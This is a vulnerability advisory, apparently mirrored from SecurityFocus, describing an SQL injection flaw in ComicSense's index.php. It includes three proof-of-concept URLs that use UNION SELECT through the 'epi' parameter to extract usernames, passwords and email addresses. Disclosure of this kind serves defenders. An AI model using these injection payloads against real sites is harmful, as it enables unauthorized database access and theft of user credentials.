ComicSense Index.PHP SQL Injection Vulnerability
TITLE: ComicSense Index.PHP SQL Injection Vulnerability
CLASS: Input Validation Error
CVE:
REMOTE: Yes
LOCAL: No
PUBLISHED: Jun 05 2007 12:00AM
UPDATE: Jun 06 2007 09:10AM
CREDIT: s0cratex is credited with the discovery of this vulnerability.
VULNERABLE:
ComicSense ComicSense 0NOT VULNERABLE:
Vai alla pagina originale su Security Focus
Discussion
ComicSense is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Exploit
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/comic_path/index.php?epi=-1 UNION SELECT username,1,1 FROM users
http://www.example.com/comic_path/index.php?epi=-1 UNION SELECT password,1,1 FROM users
http://www.example.com/comic_path/index.php?epi=-1 union select email,1,1 from users
Solution
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.
References
References:
- ComicSense Homepage (ComicSense)
- Comicsense SQL Injection Advisory/Exploit (s0cratex@hotmail.com)